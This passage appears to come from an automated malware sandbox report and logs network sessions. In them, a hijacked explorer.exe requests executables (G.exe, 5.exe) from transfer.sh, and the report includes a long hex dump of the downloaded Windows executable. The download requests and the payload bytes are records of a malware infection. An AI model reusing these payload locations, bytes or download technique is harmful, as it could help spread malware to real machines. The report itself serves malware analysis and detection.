                                                                                                                                                                                                    2022-01-14 03:59:42 UTC536INData Raw: 70 65 72 61 5d 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 66 2c 20 66 61 6c 73 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 20 66 28 29 3b 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 20 22 5f 74 6f 70 31 30 30 71 22 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 63 6f 75 6e 74 65 72 2e 72 61 6d 62 6c 65 72 2e 72 75 2f 74 6f 70 31 30 30 2e 63 6e 74 3f 70 69 64 3d 36 36 37 33 31 35 35 22 20 61 6c 74 3d 22 d0 a2 d0 be d0 bf 2d 31 30 30 22 20 2f 3e 0a 20
                                                                                                                                                                                                    Data Ascii: pera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(window, document, "_top100q"); </script><noscript> <img src="//counter.rambler.ru/top100.cnt?pid=6673155" alt="-100" />
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC536INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    3192.168.2.349862144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC536OUTGET /get/QbPlFD/G.exe HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: transfer.sh
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC536INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.14.2
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:42 GMT
                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                    Content-Length: 10
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Retry-After: Fri, 14 Jan 2022 04:59:44 GMT
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    X-Made-With: <3 by DutchCoders
                                                                                                                                                                                                    X-Ratelimit-Key: 127.0.0.1,84.17.52.18,84.17.52.18
                                                                                                                                                                                                    X-Ratelimit-Limit: 10
                                                                                                                                                                                                    X-Ratelimit-Rate: 600
                                                                                                                                                                                                    X-Ratelimit-Remaining: 9
                                                                                                                                                                                                    X-Ratelimit-Reset: 1642132784
                                                                                                                                                                                                    X-Served-By: Proudly served by DutchCoders
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC537INData Raw: 4e 6f 74 20 46 6f 75 6e 64 0a
                                                                                                                                                                                                    Data Ascii: Not Found


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    4192.168.2.349876144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    2022-01-14 03:59:47 UTC537OUTGET /get/uq3XSe/5.exe HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: transfer.sh
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC537INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.14.2
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:48 GMT
                                                                                                                                                                                                    Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                    Content-Length: 3576320
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Disposition: attachment; filename="5.exe"
                                                                                                                                                                                                    Retry-After: Fri, 14 Jan 2022 04:59:50 GMT
                                                                                                                                                                                                    X-Made-With: <3 by DutchCoders
                                                                                                                                                                                                    X-Ratelimit-Key: 127.0.0.1,84.17.52.18,84.17.52.18
                                                                                                                                                                                                    X-Ratelimit-Limit: 10
                                                                                                                                                                                                    X-Ratelimit-Rate: 600
                                                                                                                                                                                                    X-Ratelimit-Remaining: 9
                                                                                                                                                                                                    X-Ratelimit-Reset: 1642132790
                                                                                                                                                                                                    X-Remaining-Days: n/a
                                                                                                                                                                                                    X-Remaining-Downloads: n/a
                                                                                                                                                                                                    X-Served-By: Proudly served by DutchCoders
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC537INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 fa 8b e0 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 1d 00 24 02 00 00 ba 02 00 00 00 00 00 00 10 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 53 00 00 04 00 00 bb 21 37 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa$@@S!7
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC553INData Raw: 5c 11 ac 72 40 cf b1 1f ec ab 46 b2 51 e6 ae 8d 43 98 27 86 e6 af 9b b0 a6 27 1c 35 90 95 c5 32 f0 09 fd ca c2 68 bd 21 95 5c bb 3d fa f2 09 8e 63 70 99 fd fe 66 6b a7 c9 47 2c 73 f5 bd 47 14 78 08 70 54 8b 71 85 77 ee 72 96 a5 98 b2 3c 1c c2 83 35 0e 58 5a e7 59 0c e3 12 71 12 6b 97 b5 a6 17 5f ce 4c 14 7c 15 4e c3 34 f9 f5 6a 65 c9 a4 1a 90 69 f5 3c d4 cd e9 3e 94 70 5d 06 98 ff d7 f9 b8 f7 8a f7 cf d4 41 15 1a 10 24 ec 44 4d 14 4e 9f ce 96 02 95 f1 e4 3b ad 3a d1 6c 04 de 64 a1 da 56 4a 42 4b 95 af 7d 1c dc df 5a 2f d5 ff 69 5d 8c 7d 3f 48 cd e2 f7 1e ed 02 6d a0 b6 a5 12 0f 84 e9 ff f9 5c 0a 8b b6 c6 e5 fb d8 af f0 52 85 2b b2 8a 2e 27 06 29 52 62 49 6a dc 1e ef 21 a0 c7 94 b5 c0 c3 ec a7 42 a1 2f 23 89 a4 53 63 b2 4d 6a 14 02 25 b3 c0 d0 ae cf e2 9a
                                                                                                                                                                                                    Data Ascii: \r@FQC''52h!\=cpfkG,sGxpTqwr<5XZYqk_L|N4jei<>p]A$DMN;:ldVJBK}Z/i]}?Hm\R+.')RbIj!B/#ScMj%
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC569INData Raw: b3 79 b2 0c 50 d9 b1 6b 57 1e 38 e9 eb ba 2b 4d 27 df ca c2 ff d7 32 5d 8f cf 08 89 4e c8 a8 51 77 65 9a ac 24 aa e1 94 95 12 24 a9 79 48 85 50 8a 1f 8d f8 20 00 8c 0d 89 f7 96 4c 9e 32 d7 1e 1e 70 3e a0 71 b3 e0 0c 13 5d 06 05 36 b0 39 02 24 10 36 b1 1a 95 6d 5d 97 ac e6 ac 52 53 3e de 18 c6 1a 32 cb df 70 22 1e 26 7a da 90 f0 41 93 e5 6b ef 87 e1 66 74 b2 2e f9 cb 9a 25 af 1f cf b4 a9 40 2c 06 09 d9 6d 7d 5c 2d 6d 23 de c5 ed 87 b2 51 90 fd 25 af 7e 99 db 55 32 f6 da 96 ac 7e 8e 6d 2f 7b e8 db 77 7a c1 fb 52 2c 0f a0 0e b7 3a d4 67 91 05 23 d4 11 0a 8a 81 f4 05 a0 a8 f1 cc 0f 33 0d 8c 36 14 69 6f 8a 70 0b 4c 8d f4 88 2d d0 7c 75 6a 86 f8 c0 55 b8 21 da c2 d8 d6 84 f0 48 e3 0b fa 85 32 89 a0 cd cd 87 8f 77 7a cd 16 29 82 18 70 65 35 dd 57 50 c1 7b d3 08
                                                                                                                                                                                                    Data Ascii: yPkW8+M'2]NQwe$$yHP L2p>q]69$6m]RS>2p"&zAkft.%@,m}\-m#Q%~U2~m/{wzR,:g#36iopL-|ujU!H2wz)pe5WP{
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC585INData Raw: 88 28 67 60 8e d0 d7 0b fd d2 5e 6b a8 9d 4c 79 9d 37 5d 99 6f 5c a6 23 08 6e 53 c5 8e c6 95 a4 ef 00 57 85 22 40 d6 c7 e7 f3 61 70 0b 96 3c b6 43 18 9c 0c d1 a5 27 3e ee 33 6c bd 99 34 6d 4e ca ab 6e f7 30 4d 54 fc a2 67 71 a1 5e 85 67 ba 2a e1 17 91 50 be b9 7c 30 db f6 83 b3 86 9b 54 c9 d7 82 35 49 7b f6 47 e7 0e 0e 8a 96 c4 77 51 eb d9 58 44 4b 7f 45 86 30 42 94 50 4b 2c 0c 7c c9 6c 83 06 9b 4d eb 22 5f c3 a6 8a f1 60 9d 3d 28 a9 a7 cf c8 54 82 b1 45 77 3e 3d 10 bd c2 6f 29 66 f7 02 84 73 bd 94 b5 bb 3b 7c 23 b7 76 5a 84 6a 4b bc df ab e9 14 d8 66 63 a8 e8 d5 83 5a 3c 30 a2 20 d8 86 3f 0b 60 9a ed 85 04 18 25 1c 1e ab 13 a7 0f 85 83 f8 47 c3 76 77 64 0b b2 a2 61 53 f8 5c 73 5b 2a b2 97 25 77 08 24 0d 73 c5 0f d9 1a 89 5f 95 41 6d bc 46 2f 4b 35 18 11
                                                                                                                                                                                                    Data Ascii: (g`^kLy7]o\#nSW"@ap<C'>3l4mNn0MTgq^g*P|0T5I{GwQXDKE0BPK,|lM"_`=(TEw>=o)fs;|#vZjKfcZ<0 ?`%GvwdaS\s[*%w$s_AmF/K5
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC601INData Raw: f0 a9 77 8b 4a 6c 7f 46 f6 88 8d 6b 49 bc f9 3e 03 7b 3e de 42 b8 bf 53 22 c5 51 cf 69 aa 06 18 32 71 e1 5d 41 20 a6 82 bd fa 3d 34 4a e5 85 c7 64 6f 24 3e ca d8 28 17 e4 16 8b a6 73 5b 4b a4 9b 56 4e de 3c 91 8f 3d c1 21 00 93 fc 50 ee b3 9a b5 84 df ce 44 fb 4c 08 3b 52 64 17 d9 ea d6 51 39 d1 6b 0f 03 4f c9 d3 a5 ef 32 c9 5f b5 a6 c6 58 54 ab a9 ad c4 1f 09 59 f1 7d 25 a0 39 17 5b 78 79 c3 7d 7e 4d 52 26 41 12 2e 73 a8 0f c7 9a 32 14 66 28 7f 8b 10 e4 28 49 ae 80 44 bd 02 ea 7d bd ed b1 0c 89 1b 22 c5 10 d0 3d f0 b2 a6 f8 45 a6 f0 b5 42 c8 0b 2e f5 92 3c 17 97 42 7d 57 b4 36 91 a8 1f c6 63 b5 3e 13 94 5a 77 a5 56 a5 18 71 93 fa 9a c2 6e 1a 26 1d 6c d3 d9 66 31 be 82 4b 72 40 c9 5b 08 53 54 49 ed 50 b3 ae 97 d0 6f a9 61 b4 1e fd 93 53 3a 8c e0 ce 43 1b
                                                                                                                                                                                                    Data Ascii: wJlFkI>{>BS"Qi2q]A =4Jdo$>(s[KVN<=!PDL;RdQ9kO2_XTY}%9[xy}~MR&A.s2f((ID}"=EB.<B}W6c>ZwVqn&lf1Kr@[STIPoaS:C
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC617INData Raw: 1e 54 9d 7a 40 55 70 0d fe 41 fa 29 de 72 6c f5 79 cc ed 71 31 45 79 08 53 b2 f0 b6 c0 49 1a 02 93 bd 7d 02 45 08 6b 28 5d d1 98 a0 6a cf af c5 61 03 9d d4 d7 17 5a ed 65 ea af 6b dd 3e 6a 32 ee 64 f2 59 39 de d5 05 6a 55 f5 4c 82 e5 81 97 c9 31 9d 40 7d 3f aa 79 d2 0b f4 71 7f 07 79 7f ef 4a 6f 6c cf d4 90 27 b6 56 9f 61 2d 0e e4 21 f6 5b bf 80 b0 28 7b df c0 f1 63 f7 1e b6 3d c0 8b e2 9c c8 71 30 6e 6c b6 da 26 46 39 25 f1 79 87 4a fb 7b 99 56 95 44 b6 9f d5 c2 a3 69 ff ef 97 43 42 7b ef 00 3c 2e ca c6 33 2d c1 86 2f db 2d b2 b1 74 a4 d2 7f 01 7d 0e 57 c3 4f ce c6 13 41 c4 c5 72 5a 8b f4 3d a5 27 c5 23 a9 26 5b 7d d6 0a 5a c3 32 c5 3b 86 2d 8c fd 0d db 58 39 3f 45 12 3e d8 0d db 9a c6 ab a0 97 c1 8f 32 78 55 c3 b3 b0 e6 c5 f7 a1 04 6f 72 7a 45 3d 3c 46
                                                                                                                                                                                                    Data Ascii: Tz@UpA)rlyq1EySI}Ek(]jaZek>j2dY9jUL1@}?yqyJol'Va-![({c=q0nl&F9%yJ{VDiCB{<.3-/-t}WOArZ='#&[}Z2;-X9?E>2xUorzE=<F
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC633INData Raw: 71 5d 06 b9 94 07 ba a1 64 6b 8c 37 e2 77 87 b2 d0 30 06 68 9c 8d 5f b4 b0 d0 c4 23 36 01 5c b8 eb 75 33 06 d5 57 9b 8a 20 8c e8 f8 d9 2e 20 3c 08 b3 06 18 2c 21 77 1b fd 8f a7 5d ca 75 92 c9 57 2e a9 a2 b1 09 00 56 70 96 25 3c 66 8a ec 3a 57 51 1e f8 94 12 2c ce a0 40 73 01 1c 3b 21 27 8c c6 71 20 8e 07 2f d1 13 71 3f 06 66 79 da 5f 07 f2 7e 50 a7 42 32 c5 ec a7 04 e1 bd a4 77 26 ba 99 06 6a 3b 1c 59 ee 75 e9 ac 17 45 be c7 8e c0 4e 32 4d e2 8d a9 67 b2 f4 53 45 f9 ab 64 eb d1 01 d9 02 6c d8 db 50 1e 8c a6 9a fe 0e 17 8e 1b 7f ac ac f5 81 35 1a c8 5d a9 df a4 a8 bd e3 09 65 2b 4a 51 30 c7 4c a4 98 b9 69 26 23 cb 51 e0 9e d6 72 5f d8 3a 19 a6 55 e6 53 3c b4 e7 70 18 19 76 1f 04 4d ae 3f 40 db 93 70 4b 0a 74 5e 48 57 37 1d d6 dd 2d 1d 35 10 98 fa f5 59 4a
                                                                                                                                                                                                    Data Ascii: q]dk7w0h_#6\u3W . <,!w]uW.Vp%<f:WQ,@s;!'q /q?fy_~PB2w&j;YuEN2MgSEdlP5]e+JQ0Li&#Qr_:US<pvM?@pKt^HW7-5YJ
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC649INData Raw: 99 df 9d a9 14 69 15 ec d4 d2 12 35 8c a3 22 d7 fc 4c 26 dd c9 12 ea 1b c0 c8 e2 d6 1a ef 6d c2 b1 ae 58 97 f3 4a da 62 39 a3 0a 02 0c f2 d2 e6 0c 35 6f 62 82 9c d1 ac 38 c4 de 2c 72 2a e1 4b 39 4b f4 e8 54 9d e6 47 b8 fe ad fe 89 eb c2 e0 b7 0f 6d d1 13 6e 1c b9 4c a3 d3 e6 ae 2f 0a c7 48 8c 08 a5 ed dd 4c 32 d4 65 8e 0e 45 74 c3 51 63 f1 3c ec 91 a7 c1 da 70 9c fa 28 38 f1 5b 56 bc 33 8f 06 dc ac 5f f9 85 94 14 91 50 ee 53 8b 32 86 c4 8a 62 11 bd 57 80 3b 6c 54 2f 51 cc bd 5f ac f9 da 1a ea 6d 8e 0c 10 ed 13 88 dd 63 d8 d5 cd 04 61 e3 a6 bf bf e9 6c ca 0e b2 d9 65 85 14 30 f3 f5 45 f6 70 02 dd 16 d7 40 87 49 9a 31 03 a8 d3 71 36 7f 35 b6 b7 05 9a 33 31 bf 05 a9 8a 9f 72 d6 8b 9c 1d ad 70 b5 10 06 f0 90 43 74 d6 3c ee 84 52 e4 b7 76 84 41 25 c0 0e 33 4e
                                                                                                                                                                                                    Data Ascii: i5"L&mXJb95ob8,r*K9KTGmnL/HL2eEtQc<p(8[V3_PS2bW;lT/Q_mcale0Ep@I1q6531rpCt<RvA%3N
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC665INData Raw: 90 cd bd 74 a9 e8 c1 b3 9a 52 b0 55 2a 06 32 59 81 60 4e 8c 68 8e bd cd 1e a6 e6 0e bd 2c 9a a9 ad 41 b1 18 7d b6 d1 ca b7 af e0 e0 06 01 4c de e6 a3 6a a9 50 e9 7b cd ce d6 bd d4 23 6e 26 e2 c5 2d 34 4b 8c d4 f2 56 a3 db a3 1b b1 44 19 9e 0a ce 8f e6 2a c0 bb df a3 f4 f0 1e 74 23 3f e4 2a 84 a3 28 55 95 09 26 ad 4f ff 1b 9e 46 7b a7 8e cc 45 10 5b 0e 38 a0 27 bf 13 93 7a 89 9f 31 43 af 7f 24 e1 b6 6d 0f 03 df 0f 1b 30 fb 52 4b d3 f9 69 7a b4 6b fe 09 26 43 1a 98 72 53 3d 55 70 00 44 38 cf 26 51 63 94 97 93 e2 a7 c0 2a 18 f4 c7 9d ab 72 d2 44 15 2f f3 f7 58 30 6c 45 34 fd 85 c7 ad 00 44 2a 62 c5 4b 05 d1 74 17 c2 e4 d7 0a f0 e4 11 4f ff 64 cd d3 5f 9f 36 f4 26 e1 55 af 08 10 5f 25 3e ed 1c 7c ed 82 a5 3e bd 51 10 1a 72 bd 15 63 a8 0e eb 35 59 62 79 29 c7
                                                                                                                                                                                                    Data Ascii: tRU*2Y`Nh,A}LjP{#n&-4KVD*t#?*(U&OF{E[8'z1C$m0RKizk&CrS=UpD8&Qc*rD/X0lE4D*bKtOd_6&U_%>|>Qrc5Yby)
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC681INData Raw: d5 d8 47 45 ca 84 8c 87 55 6a f5 49 f2 99 f0 c8 e9 61 09 f9 f5 e6 fb e0 3b bb 66 1e 17 ae 13 a4 c8 e8 a9 54 c7 f7 6a 58 ca 32 17 bc e2 9f 48 ac 92 2b 33 b9 4f 0e c1 90 ab a1 c9 95 5f 51 41 b0 bf 8e 5e e2 59 5a 34 4e 64 24 2d af f5 9d 75 d2 14 b7 0d 9a a5 66 1b 12 8d 0c 0c 45 f4 ee a4 23 4c 92 79 f1 67 03 6f ca f3 37 95 e7 38 07 76 0f 55 5c 98 76 6e 04 b1 4e ae 75 6e 14 42 73 97 40 60 bf 6b 06 6d 9f d2 7a 28 3e b0 70 22 7e 11 f0 3a cd c1 52 19 28 79 25 13 16 0b 2f b1 72 0c d8 a3 ee af 2b ba cd aa dd 06 cf d8 4e 04 ca c7 20 aa 7f a2 4a 3e d5 91 c1 3c 54 ea e1 b5 2a 1f e4 77 7a ca a2 71 95 da 01 bc 89 76 5f 45 af a0 08 50 f1 0a 2d 50 e5 81 7f 39 c6 85 5a 2f e7 dc 65 41 40 2b d6 1a e5 8f 4b 9c 92 8c aa 4b 9f 06 e4 e6 af 22 3f a1 05 18 79 17 83 e3 cd f8 2b 34
                                                                                                                                                                                                    Data Ascii: GEUjIa;fTjX2H+3O_QA^YZ4Nd$-ufE#Lygo78vU\vnNunBs@`kmz(>p"~:R(y%/r+N J><T*wzqv_EP-P9Z/eA@+KK"?y+4
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC697INData Raw: 70 93 17 14 40 dc a1 fc bd f8 c6 8a e3 e4 ee 56 f9 e7 5c 61 8c 82 63 ee 2b 5e dc 14 94 f6 c7 f8 77 46 7c f6 c2 50 d0 e2 9e ef 16 40 62 76 4a 1e 21 a3 75 b0 e8 ae 07 7c bb bd 86 ca 9c 76 aa 56 7a 8b 72 ba 6b cb 3a 6f 59 f1 92 b5 84 8e be 35 02 08 08 bf 57 9f 2f a5 f4 34 17 5e b1 2b 65 28 b2 46 b9 79 8f 4e 19 ad b8 fd 32 28 53 c4 9a 3f 37 1d c0 1e d3 2c 48 12 3a 59 14 07 ab b4 03 0d 01 e0 71 30 dd 3d 43 45 f4 02 ad e3 26 11 2f c0 d2 89 20 76 77 e5 81 e1 f9 eb 65 8d 31 8f 2f 59 11 00 ce 37 04 2a a1 02 c8 2c 72 16 71 d7 a3 4c 9e 88 30 84 bc d2 aa b2 da dc 16 21 ef 2f 1b 7c 95 92 16 01 3d 9a b8 08 eb 01 77 1e c6 23 a3 38 97 8e 7c 1d 99 2e c6 f2 d2 53 f8 e7 0f 68 4f b6 a1 42 e0 df d6 4f 77 f9 ac a4 73 3f 3e bc 20 3e d5 c9 b5 ec a6 17 78 c8 d5 a2 57 d3 0c bc 61
                                                                                                                                                                                                    Data Ascii: p@V\ac+^wF|P@bvJ!u|vVzrk:oY5W/4^+e(FyN2(S?7,H:Yq0=CE&/ vwe1/Y7*,rqL0!/|=w#8|.ShOBOws?> >xWa
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC713INData Raw: f9 9a ab ea dd f1 d4 ea 61 59 13 ca ad 6b fa 99 29 9e 7b 0b 3f d8 47 57 52 63 17 23 41 3b 51 4d 4c c6 ab 9d 10 b6 48 c3 8c 30 10 b8 2a 7f 68 05 30 da 06 d5 28 37 69 42 1c 62 2b cf 23 67 a2 27 43 29 a7 98 c8 32 7a cb a2 27 8a 79 78 df 39 7b f4 18 8f 58 a2 85 d7 92 f3 c8 5b 5d a4 5a 6c 8e 19 37 0c 05 24 c0 29 8a 20 29 67 19 b6 f9 74 62 e1 d5 a0 a6 52 d2 be 54 31 ff 44 7d 27 0b 01 51 8b 40 99 0c 9a c8 69 f2 81 1f 6d 19 6a 39 20 51 94 c4 a1 28 a3 c6 ee e2 cf 0f 82 d1 bd c5 4b ae b3 25 77 3d 1d 38 3e f0 2e 29 0a df 79 f8 93 8f 74 13 c6 a6 54 33 89 5c 60 1a df 2a c2 23 0a 9b bc 79 bc 06 56 a1 d7 e1 58 ae 4e ff 03 89 84 00 9d 7d 54 e6 71 c4 ff 9d cd 6f 45 fd ba e7 ec 5a b3 17 40 66 b7 89 0e 9a f0 43 6d 88 99 b7 0a c1 35 cc 1e eb 57 1d d1 90 92 24 0b 0a fd ab 48
                                                                                                                                                                                                    Data Ascii: aYk){?GWRc#A;QMLH0*h0(7iBb+#g'C)2z'yx9{X[]Zl7$) )gtbRT1D}'Q@imj9 Q(K%w=8>.)ytT3\`*#yVXN}TqoEZ@fCm5W$H
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC729INData Raw: 61 a8 03 e6 a5 a4 16 44 0c 0e 35 24 29 31 c6 68 ca ec 14 2b 3e ca 9f 67 df 2b 13 b1 62 e8 0a 77 ec 4c 3f 54 6b 55 f4 45 be 0f 31 63 c4 d9 b8 3d d1 07 92 61 73 16 c9 38 08 ea 54 14 1d c3 3c 00 be 66 ee 47 11 fb 6b e9 27 6c 73 80 0f 31 97 80 13 17 ce cf 8a f8 f0 ce 2c 13 44 d4 31 1c 9f 52 ce c6 44 ff 78 48 cc ac 2d a7 b7 d3 d9 47 6d 9c 06 26 2a fd f0 7a f8 80 91 47 fb dc 69 05 ef 56 c8 64 c8 7e 9d 3a 4f de e6 1b ef 9a a6 17 e1 6f 7c 49 7a 2f 96 5b 84 68 12 a6 0f ee e2 c8 a8 b6 c3 48 12 28 4a e7 0f 6c 2c e7 79 2b 7d ff 7c 7a 67 dc ff 2e b9 aa 63 43 f9 38 5d 0e 1b 6d 03 12 5b ca 72 c8 70 fb ee aa 1c b0 fe 51 26 e6 70 ba ad 1a c7 ed bc d2 65 c9 da 19 a3 ab 1a e3 a4 bc a0 8c a8 cd f6 b6 d4 78 62 1e 51 14 5c 44 a2 bc 3d 19 d3 3f 16 ce ec 20 90 01 10 03 7d 70 57
                                                                                                                                                                                                    Data Ascii: aD5$)1h+>g+bwL?TkUE1c=as8T<fGk'ls1,D1RDxH-Gm&*zGiVd~:Oo|Iz/[hH(Jl,y+}|zg.cC8]m[rpQ&pexbQ\D=? }pW
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC745INData Raw: 80 c5 fe 08 93 04 d3 24 00 d4 3d 70 67 29 70 29 ea aa 64 fc b0 81 47 e1 4b 8c fb 26 ef f2 b3 17 58 ae b2 ac 23 ec f3 be 38 48 0f ed b8 a8 6f 2d af 5a ac 1e 28 fa 84 7d 87 4c 22 e6 db 2f ea 4d a8 46 b4 38 61 0d 90 b7 4d 36 85 1d eb ef ce a4 c4 03 90 64 44 c0 fd 1c b1 8b d3 94 f5 f8 c3 d4 94 51 72 ed 9a e8 a2 b1 96 3d e4 fd 34 c2 d3 bf 29 24 b5 b6 1a aa 89 8e 49 61 c6 c4 e0 fc ec 6b 6b 14 41 21 dd 7f 18 d5 b4 2e bf cf 4a 2d 6d ec 8a ed 07 b0 2e b0 fa 52 84 13 72 66 f1 6f c0 d8 a8 e6 61 fe 8c 6a 00 be f1 a3 a3 4e e7 90 f0 f9 0d 7e aa eb 2c 31 03 95 93 ac 6f 6d ba d3 78 5d f1 5d 1b f2 4a 55 87 4e be 53 71 e2 2e e1 b8 3e 36 0f 8e bc ee 3b cb 1a 3c e3 e6 e6 cd 97 32 3d 99 2a 24 ae 50 e5 1c a4 66 c9 a3 30 bb 07 99 a7 fc 13 cd db 6a e8 ea cc 65 08 a5 82 a9 5d b9
                                                                                                                                                                                                    Data Ascii: $=pg)p)dGK&X#8Ho-Z(}L"/MF8aM6dDQr=4)$IakkA!.J-m.RrfoajN~,1omx]]JUNSq.>6;<2=*$Pf0je]
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC761INData Raw: cd a0 5e 86 d3 89 dc ec 77 5c 51 e4 6e 3c 31 7b 61 0f 04 15 e7 7a c2 d4 bc d0 af 10 c2 60 5d aa 1c 0d ce 33 1a 74 48 fc c9 68 46 04 85 dc d9 69 f8 4a b0 a6 bd 81 1b 28 b2 e8 6a ad 02 c1 8d d8 5c 0c 2d 23 2e a7 ee 45 f9 d7 72 47 27 f0 91 21 c5 f2 8d 1e ed 9e 52 78 da e2 77 ee 1f 65 91 e9 e5 10 03 c3 81 f4 78 01 a4 df da 78 e9 a9 a8 64 00 2e 77 6d 20 aa 52 a4 6b cf 39 f1 1b 7b ff 5b 19 b3 6a 25 ec e6 86 53 67 04 fb 06 c7 b4 ed 91 82 c8 a3 18 82 93 9b b6 47 16 03 ea 70 a2 00 69 3d 37 53 40 19 60 08 ff 8d bd 04 91 f4 bb 1b 61 35 9e 4e 75 0d 2b ba c9 a0 37 81 b1 8f ec fd 73 76 e1 a0 e4 04 20 eb 46 d4 67 1c 11 ba 96 73 1f 04 4e 14 bf 88 23 f8 3a 61 b5 ff a9 12 8c ad 8e 73 46 14 f9 44 3b 18 68 8e cb 73 60 d6 83 e8 64 83 b4 c3 24 38 6f 58 fb f8 9d 91 bd 05 ee bb
                                                                                                                                                                                                    Data Ascii: ^w\Qn<1{az`]3tHhFiJ(j\-#.ErG'!Rxwexxd.wm Rk9{[j%SgGpi=7S@`a5Nu+7sv FgsN#:asFD;hs`d$8oX
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC777INData Raw: 52 e8 0f af 13 d3 5c c3 83 87 c9 f7 a1 53 49 69 1a 45 f3 74 94 00 ba 40 70 1c a5 e3 48 c7 8f 33 d1 ff db 02 5b c1 f4 ee df 56 1b 7f 43 42 cf b3 03 35 2b f0 09 af 4a ba c1 b9 2b cd 26 cc cb bb 16 60 9f 1c 65 96 be a9 e5 35 c3 18 96 cf df 1b 01 96 2d 86 48 7f 76 99 b0 17 83 f9 bd b3 2c 09 f4 df 83 92 8d 7a ff 5f 91 f4 fa 10 5d 7a bf 98 33 43 4f 14 bf bf 7f 19 31 03 c2 84 36 fe b0 56 a6 a2 8d 0e 64 a3 18 dd 09 7d 08 f6 6d 66 e3 0e 22 3e d2 ff 38 05 c7 b5 3c 70 4f 96 17 9c 56 6c 3d e1 79 54 79 9d 09 ff d3 9b 3d b4 54 bd d5 e7 ff 4d 8c bc 93 f7 56 0b c8 ce 1a 1a 16 d5 49 37 ed ee d6 30 b5 51 3e 9c 40 d1 dc 9e b5 e4 5e 31 19 62 42 f9 f7 f5 2a 58 99 02 5f 97 9d 11 81 89 2d 36 73 37 51 95 95 57 c6 9c e6 7d 39 96 71 b2 6c fb d1 db 22 24 c8 cd a3 db b3 3c d1 a3 94
                                                                                                                                                                                                    Data Ascii: R\SIiEt@pH3[VCB5+J+&`e5-Hv,z_]z3CO16Vd}mf">8<pOVl=yTy=TMVI70Q>@^1bB*X_-6s7QW}9ql"$<
